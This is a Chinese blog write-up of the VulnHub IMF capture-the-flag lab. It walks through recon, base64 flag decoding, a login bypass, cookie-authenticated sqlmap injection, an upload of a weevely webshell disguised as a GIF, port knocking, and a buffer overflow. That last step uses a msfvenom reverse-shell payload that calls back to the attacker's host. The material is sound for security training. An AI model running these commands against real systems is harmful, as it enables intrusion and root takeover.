8-vulnHub-IMF

最新推荐文章于 2024-07-10 18:28:12 发布
最新推荐文章于 2024-07-10 18:28:12 发布
阅读量459 收藏 4
点赞数
分类专栏: vulnhub50 文章标签: linux python 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809826/article/details/119036124
版权

VulnHub-IMF

靶机地址:
目标:得到root权限&找到6个flag.txt
作者:尼德霍格007
时间:2021-7-23

信息收集

扫描目标主机

nmap -sP 192.168.21.0/24

image-20210723001534877

扫描开放端口

image-20210723001759099

发现只开放了80端口,访问看看

image-20210723001842291

flag1

在Contact Us页面源码中发现flag1

image-20210723002142605

flag1{YWxsdGhlZmlsZXM=}
大括号内是是一个base64值,解密一下

allthefiles

继续搜索看看还有没有base64值,搜到还有,继续解码

image-20210723002431210

flag2

这里解密完发现不太对,第30、31和32行的拼接到一块儿才是base64密文

image-20210723002820510

ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==

解密

得到flag2

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

继续解密

aW1mYWRtaW5pc3RyYXRvcg==

得到

imfadministrator

可能是目录,访问一下试试

image-20210723003126839

第一个allthefiles不是,试试第二个imfadministrator

image-20210723003208959

是一个登陆页面,查看源码

image-20210723003427673

image-20210723003606654

没啥有用信息,回到之前的Contact Us页面,看到三个用户名

image-20210723004111053

试试登陆,burpsuite抓包密码设为空数组,如下图

image-20210723004449089

flag3

image-20210723004803493得到flag3

flag3{Y29udGludWVUT2Ntcw==}

解密得到

continueTOcms

点击访问上图中的IMF CMS
image-20210723004931725
看到页面链接是带有?的,疑似存在SQL注入

验证一下,页面链接后加个单引号

image-20210723005224669

如上图所示,数据库报错,确实存在SQl注入漏洞

这种情况就直接使用sqlmap进行注入,但是这里是在登陆成功之后才有的注入点,所以注入时要带有登陆成功的Cookie,这里把前面的burpsuite的cookie复制下来

image-20210723012742280

使用sqlmap --cookie参数进行注入

sqlmap -u 'http://192.168.21.144/imfadministrator/cms.php?pagename=disavowlist' --cookie 'PHPSESSID=477nnqbpntd9vvnmeit8h624s5' --dump all

image-20210723012826062

根据注入的结果,获得了一张图片的路径,查看一下

flag4

http://192.168.21.144/imfadministrator/images/whiteboard.jpg

image-20210723012953211

有个二维码,扫描结果是

flag4{dXBsb2Fkcjk0Mi5waHA=}

解密得到

uploadr942.php

获取shell

像是个目录,访问

image-20210723013145526

是个文件上传页面

我这里试了一下,发现好像只能上传jpg、png、gif文件,考虑制作一个带木马的图片上传试试

使用工具weevely生成一个PHP木马文件,密码hello

image-20210723014317492

试着上传这个文件,上传失败

image-20210723014503388

将生成的muma.php改名为muma.gif,头部加上GIF98a,目的是骗过检测,让他以为这是一张gif图片。随意添加GIF数值(我这里写了22333),保存

image-20210723014857524

然后上传这个文件,上传成功

image-20210723014945299

查看页面源码,返回值:b533cd00f6f4

image-20210723015110504

这是gif文件上传到服务器的文件名称b533cd00f6f4

使用weevely连接

weevely http://192.168.21.144/imfadministrator/uploads/b533cd00f6f4.gif hello

连接成功

flag5

image-20210723015651778

获得flag5

image-20210723015813921

flag5{YWdlbnRzZXJ2aWNlcw==}

解密得到

agentservices

提示为代理服务

通过提示在靶机中查询agent运行的文件

find / -name agent &>1/dev/unll

&>1/dev/unll:将错误输出到/dev/unll,只显示正确结果

image-20210723020232073

在这两个目录下有agnet文件
进入bin目录,发现两个文件

image-20210723020331408

查看access_codes,提示SYN 7482,8279,9467(同步序列编号)

image-20210723020543617

查看端口,端口7788也有代理在运行

image-20210723021134832

提示端口试探,使用knock命令敲门

安装knock

git clone https://github.com/grongor/knock.git

image-20210723021812510

敲门

image-20210723021914743

重新扫描端口

image-20210723022028764

这样就敲开了靶机的7788端口

nc连接一下,要agent ID

image-20210723022122254

前面我们运行/usr/local/bin目录下的agent会需要输入ID

image-20210723022243182

所以我们从这里入手

先把这个agent文件传到kali本地

file_download /usr/local/bin/agent /root/agent

image-20210723022459737

image-20210723022628951

加执行权限

image-20210723022704644

使用ltrace跟踪agent在执行过程中调用库函数的情况

ltrace ./agent

image-20210723134732833

输入任意参数,有个返回值,这是正确的agent ID

image-20210723134911288

再次执行,输入正确ID

image-20210723135028855

有3个选项

image-20210723135238149

  1. 提取分

  2. 请求提取

  3. 提交报告

四、提权

看来通过缓冲区溢出agent进程获得root权限了
为agent进程创建一个shell
使用msfvenom创建一个shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.21.128 LPORT=6666 -f python -b "\x00\x0a\x0d"

-p 选择payload(此次因为agent是32位,所以使用X86
LHOST 、LPORT 监测主机IP和端口
-f 指定生成xxx格式
-b 在生成的程序中避免出现的值
\x00 == 0x00 ASCII控制字符表中对应 NULL (空字符)
\x0a == 0X0a ASCII控制字符表中对应 LF (换行键)
\x0b == 0x0b ASCII控制字符表中对应 VT (垂直定位符号)

使用大佬写的py脚本,将生成的内容,替换python脚本内容

https://github.com/jessekurrus/agentsploit

image-20210723140155267

image-20210723140751247

nc监听6666端口

image-20210723141044850

执行脚本

python agentsploit.py 192.168.21.144 7788

image-20210723141108554

成功获得root权限

image-20210723141220395

flag6

获得flag6

image-20210723141415307

flag6{R2gwc3RQcm90MGMwbHM=}

base64解密

Gh0stProt0c0ls

总结

前面的flag还挺好找的,从熟悉BP、写木马、gdb拆解、二进制等等。到了后面关于缓冲区溢出方面的难度就很大,接触的比较少,这里卡了好几天,才基本明白一点利用方式和原理,也是自己薄弱的地方,还需要大量的时间去理解。

未命名文件1

尼德霍格007
关注
专栏目录
小白的靶机-VulnHub-IMF
wo41ge的博客
12-24 338
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 目标:得到root权限&找到四个flag.txt 开机界面就是个这 确定靶机地址:192.168.86.172 发现80端口 运行着Apache 直接上页面康康 这个选项 右键源代码发现flag1 flag1{YWxsdGhlZmlsZXM=} 发现这是一个base64的加密 进行解码 allthefiles 还有一个base64加密的标签 解码康康 这里有一个坑 他们三个 是连在一起的 只有
vulnhub-IMF 靶机的上传和linux缓冲区溢出
冬萍子癸水
04-22 539
这篇文章暂时只记录上传和linux bof。。。。留我自己学习和记录 上传这里检测的挺严的。。。system passthru这些函数都能检测,即便是改文件为图片,加gif89在开头都没用。。。 这个时候用weevely很方便,加密了php函数代码。 创建go.php 然后密码是666.再把这个php文件改为gif文件 weevely generate 666 go.php mv go.ph...
【渗透测试】VulnHub-IMF: 1
m0_52923241的博客
12-05 550
VulnHub-IMF: 1VulnHub-IMF: 1渗透思路小知识点一、php中使用url传递数组的方法二、sqlmap用到的参数理解三、文件上传提权四、缓冲区溢出常用工具一、weevely:(Linux菜刀)php webshell的安全测试工具二、ltrace:跟踪进程调用库函数的情况工具 VulnHub-IMF: 1渗透思路 参考文章:VulnHub-IMF: 1渗透测试详细流程 参考文章:VulnHub-IMF: 1渗透测试详细流程 渗透思路: 第一步,还是nmap扫ip,端口,开放80端口,访
[Vulnhub] IMF File Upload Bypass&Buffer Overflow
最新发布
07-10 862
#File Upload Bypass #BOF
Vulnhub靶机 IMF
菜浪马废的博客
04-16 969
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ== flag2{aW1mYWRtaW5pc3RyYXRvcg==} imfadministratorroot 直接找到了flag2 进入contact界面 拿到flag1 解码 all the files root flag2得到的字符串 去点root 访问一下 得到登录页面 可以猜解用户名 ...
【甄选靶场】Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
09-23 3091
Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出) 网络安全,信息安全,渗透测试
【打靶记录】VulnHub-IMF靶机渗透wp
qq_39972370的博客
01-14 1169
IMF 是一个初级难度的boot 2 root 靶机。 flag难度从简单到困难,并且每个flag都含有关于获取下一个flag的提示。
eemd.rar_EEMD分解_EEMD分解 MATLAB_EMD分解 matlab_eemd-imf_eemd各imf分量
09-19
- 如果满足IMF条件,将中间模态函数作为新的IMF,将原始信号减去该IMF得到残余;如果不满足,则继续上述步骤,直至满足条件。 - 重复以上过程,直至原始信号变为单一的残余,即最后一个IMF。 **2. EEMD集合经验模态...
CEEMD分解-imf分量相关系数-信息熵特征
01-14
在IT领域,尤其是在数据分析和信号处理中,"CEEMD分解-imf分量相关系数-信息熵特征"是一个重要的概念组合。这个实验涉及到几个关键的技术点,我们将逐一深入探讨。 首先,CEEMD(Complete Ensemble Empirical Mode ...
Android-development-sample---IMF.rar_Android softKeyboard_androi
09-23
8. **调试与测试**:提供调试技巧,以及如何在模拟器或真实设备上测试软键盘应用。 9. **发布与打包**:讲解如何将软键盘应用打包成APK,以及发布到Google Play或其他应用市场。 通过这个样本项目,开发者不仅可以...
java生成海报实例源码-imf-conversion:NFIMF媒体转换实用程序允许从IMF包中的指定CPL创建平面文件
06-15
JDK-8(不是 JRE!)构建。 必须设置 JAVA_HOME 并且 'java' 必须在 PATH 中。 分配 项目构建完成后,在根项目的'build'文件夹中创建发行版 ./build/imf-conversion-utility-{version}.tar ./build/imf-conversion-...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
hyjcking的博客
12-01 1367
今天这台靶机涉及的知识点非常全面 1.有文件上传漏洞 2.基于cookie的sql注入漏洞 3.sqlmap的使用 4.用kali自带的木马生成工具weevely生成绕waf的一句话木马 5.使用绕waf的木马和普通gif结合生成gif图片木马, 6.使用knock敲开隐藏的服务器端口, 7.使用ltrace函数跟踪进程的库函数调用从而得到正确id, 8.用msfvenom生成一个针对性的shellcode然后对目标服务器端口进行缓冲区溢出攻击从而得到root权限
VulnHub-IMF-靶机渗透学习
嗯嗯呐的博客
11-26 2973
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志都包含下一个标志的提示。我希望您喜欢这个虚拟机并学到一些东西。 目标:得到root权限&找到六个flag.txt 作者:嗯嗯呐 目录信息收集PHP数组绕过getshell缓冲区溢出提权总结 信息收集 Nmap
【甄选靶场】Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
08-24 1283
【甄选靶场】Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)
vulhub - IMF writeup
Jiajiajiang_的博客
04-16 2358
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/imf/IMF.ova 准备工作: 下载.ova文件,直接双击即可安装成功。 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 发现IP为10.0.3.131。 端口...
No.8-VulnHub-IMF: 1-Walkthrough渗透学习
qq_34801745的博客
01-06 2808
** VulnHub-IMF: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志...
vulnhub-MIF
HEAVEN569的博客
02-14 436
MIF 靶机下载链接: https://download.vulnhub.com/imf/IMF.ova 1.信息收集 查看靶机的ip地址,及开放的端口 nmap -sC -sS -sV 10.7.184.0/24 ip:10.7.184.162 80端口 http服务打开了 可以使用浏览器连接服务器 使用gobuster 进行目录扫描 root@kali:/usr/share/seclists/Discovery# gobuster dir -w /usr/s...
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7669
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
Vulnhub通关手册》—— 04 Five86-1
weixin_53801131的博客
12-30 602
Vulnhub通关手册——04 Five86-1 背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为100.10.10.133,将该IP地址添加到hosts文件中,映射到域名five86.local 技术要点: opennetadmin漏洞利用 find / -type f -user 用户名查看该用户名可以读取的文件 使用hash-identifier查看加密方式 使用crunch生成字典 使用hashcat工具进行密码破解
ceemd分解-imf分量相关系数-信息熵特征
09-05
CEEMD分解是一种对非线性和非平稳信号进行分解的方法,通过将原始信号分解成多个固有模态函数(IMF)来获得信号的时频特征。IMF分量相关系数用于描述不同分量之间的相关性,通过计算不同IMF分量之间的相关系数可以了解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值